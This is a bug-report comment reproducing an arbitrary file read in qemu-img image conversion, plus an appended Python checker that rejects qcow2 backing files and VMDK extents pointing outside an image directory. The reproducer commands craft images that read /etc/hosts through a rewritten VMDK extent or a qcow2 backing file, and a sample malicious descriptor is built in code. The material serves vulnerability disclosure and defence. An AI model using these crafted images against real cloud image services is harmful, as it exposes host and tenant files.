Comment 2 for bug 1996188

Dan Smith (danms) wrote : Re: Arbitrary file access through custom VMDK flat descriptor

Here's a reproducer of the underlying operation without the need for any nova or glance:

# Create a 1M monolithicFlat VMDK: leak.vmdk is a text descriptor, leak-flat.vmdk the data extent
qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
# Point the descriptor's extent line at a file we should not be able to read
sed -i 's#leak-flat.vmdk#/etc/hosts#' leak.vmdk
# Conversion follows the extent reference, so the raw output starts with the contents of /etc/hosts
qemu-img convert -f vmdk -O raw leak.vmdk leak.raw
head -n1 leak.raw

Note that I can repro the behavior with qemu-img using qcow2 as well:

# A qcow2 whose backing file (-b) is /etc/hosts, declared as raw (-F raw)
qemu-img create -f qcow2 -F raw -b /etc/hosts leak.qcow 1M
# Converting to raw reads the backing file, so the output again starts with /etc/hosts
qemu-img convert -O raw leak.qcow leak2.raw
head -n1 leak2.raw

Which means even people that don't use vmdk can't just ban that format to work around this, I suspect.

This helps quantify what I think is going on here under the covers so we can determine which other projects are affected. Glance does effectively the above commands if image conversion is enabled, so I suspect it is affected without needing nova at all, if and when image conversion is in use. I'll have to check.

Not sure about cinder, but I suspect if it can lay down a COW-based image on a volume in raw format, it too is probably affected.

I'm guessing that maybe we'll need to come up with some difficult rules about backing file locations and inspect/reject based on those. I would say that nova requiring that backing files are in /var/lib/nova would be enough, but that wouldn't prevent me from snooping someone else's image if I could determine their UUID.
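The inspect/reject step sketched in the comment above, as an added example that is not part of the bug report and is not nova, glance or qemu code: it reads the qcow2 header and the VMDK descriptor directly (following the public qcow2 and VMDK layouts) to find every file the image would make qemu-img open, and decides before any conversion runs. The function names, the acceptance policy (uploaded qcow2 images get no backing file at all by default, because, as the comment notes, a directory rule alone still lets one tenant name another tenant's image; VMDK extents must be bare file names resolving inside the image's own directory), and the sample images are this example's own assumptions.

```python
"""Inspect a qcow2 or VMDK image for external file references before
qemu-img convert touches it.  Added example, not code from this bug report,
nova, glance or qemu; policy, names and samples are this example's own."""
import os
import re
import struct
from typing import List, Optional, Tuple

QCOW2_MAGIC = b"QFI\xfb"
# First 72 bytes of a qcow2 header (big-endian): magic, version,
# backing_file_offset, backing_file_size, cluster_bits, size, crypt_method,
# l1_size, l1_table_offset, refcount_table_offset, refcount_table_clusters,
# nb_snapshots, snapshots_offset.
QCOW2_HEADER = struct.Struct(">4sIQIIQIIQQIIQ")
# Extent lines such as  RW 2048 FLAT "leak-flat.vmdk" 0  and parent pointers.
_EXTENT_RE = re.compile(r'^\s*(?:RW|RDONLY|NOACCESS)\s+\d+\s+\w+\s+"([^"]*)"', re.M)
_PARENT_RE = re.compile(r'^\s*parentFileNameHint\s*=\s*"([^"]*)"', re.M)


def qcow2_backing_file(data: bytes) -> Optional[str]:
    """Backing-file path recorded in the qcow2 header, or None."""
    if len(data) < QCOW2_HEADER.size or data[:4] != QCOW2_MAGIC:
        raise ValueError("not a qcow2 image")
    _, _, bf_off, bf_len = QCOW2_HEADER.unpack_from(data)[:4]
    if bf_len == 0:
        return None
    if bf_len > 1023 or bf_off + bf_len > len(data):
        raise ValueError("backing_file field out of bounds")
    return data[bf_off:bf_off + bf_len].decode("utf-8", "replace")


def vmdk_referenced_files(data: bytes) -> List[str]:
    """Every file a VMDK descriptor points at (extents plus parent hint)."""
    if data[:4] == b"KDMV":
        # Sparse extent: the descriptor is embedded; its offset and size in
        # 512-byte sectors sit at byte 28 of the little-endian header.
        desc_off, desc_len = struct.unpack_from("<QQ", data, 28)
        text = data[desc_off * 512:(desc_off + desc_len) * 512]
    else:
        text = data  # plain text descriptor (monolithicFlat, twoGbMaxExtent*)
    text = text.split(b"\0", 1)[0].decode("utf-8", "replace")
    if not text.startswith("# Disk DescriptorFile"):
        raise ValueError("not a VMDK descriptor")
    return _EXTENT_RE.findall(text) + _PARENT_RE.findall(text)


def reference_violation(ref: str, image_dir: str) -> Optional[str]:
    """Why a referenced path is unacceptable, or None if it is fine.
    Policy: a bare file name that resolves (symlinks included) inside image_dir."""
    if not ref or os.path.isabs(ref) or "/" in ref or "\\" in ref or ref in (".", ".."):
        return f"{ref!r}: must be a bare file name"
    resolved = os.path.realpath(os.path.join(image_dir, ref))
    if os.path.dirname(resolved) != os.path.realpath(image_dir):
        return f"{ref!r}: resolves outside {image_dir}"
    return None


def inspect_image(data: bytes, image_dir: str,
                  allow_backing: bool = False) -> Tuple[bool, str, str]:
    """(accept, format, reason).  Pass the returned format as -f to qemu-img
    so it cannot re-probe the file as some other driver."""
    if data[:4] == QCOW2_MAGIC:
        ref = qcow2_backing_file(data)
        if ref is None:
            return True, "qcow2", "no backing file"
        if not allow_backing:  # uploaded images never get to name a backing file
            return False, "qcow2", f"backing file {ref!r} not permitted"
        why = reference_violation(ref, image_dir)
        return why is None, "qcow2", why or f"backing file {ref!r} inside {image_dir}"
    if data[:4] == b"KDMV" or data.startswith(b"# Disk DescriptorFile"):
        refs = vmdk_referenced_files(data)
        for ref in refs:
            why = reference_violation(ref, image_dir)
            if why:
                return False, "vmdk", why
        return True, "vmdk", f"extents {refs} inside {image_dir}"
    return True, "raw", "no qcow2/vmdk container; convert only with -f raw"


# Constructed samples (not real uploaded images).
def make_qcow2(backing: Optional[str]) -> bytes:
    """Minimal qcow2 v2 header, optionally naming a backing file."""
    bf = backing.encode() if backing else b""
    return QCOW2_HEADER.pack(QCOW2_MAGIC, 2, 72 if bf else 0, len(bf), 16,
                             1 << 20, 0, 1, 0x10000, 0x20000, 1, 0, 0) + bf


VMDK_FLAT_OK = (b"# Disk DescriptorFile\nversion=1\nCID=fffffffe\nparentCID=ffffffff\n"
                b'createType="monolithicFlat"\n\n# Extent description\n'
                b'RW 2048 FLAT "leak-flat.vmdk" 0\n\n# The Disk Data Base\n#DDB\n')
# The sed from the reproducer, applied to the constructed descriptor.
VMDK_FLAT_EVIL = VMDK_FLAT_OK.replace(b'"leak-flat.vmdk"', b'"/etc/hosts"')


def make_sparse_vmdk(descriptor: bytes) -> bytes:
    """Minimal KDMV header at sector 0 with the descriptor at sector 1."""
    sectors = (len(descriptor) + 511) // 512
    hdr = struct.pack("<4sIIQQQQ", b"KDMV", 1, 3, 2048, 128, 1, sectors).ljust(512, b"\0")
    return hdr + descriptor.ljust(sectors * 512, b"\0")
```

The check is only as good as the format qemu-img ends up using: the returned format string is meant to be passed as `-f` on the convert command, since letting qemu-img probe the file could select a driver other than the one inspected. Images in formats this example does not parse are reported as raw, which is only safe if the caller really does convert them with `-f raw`.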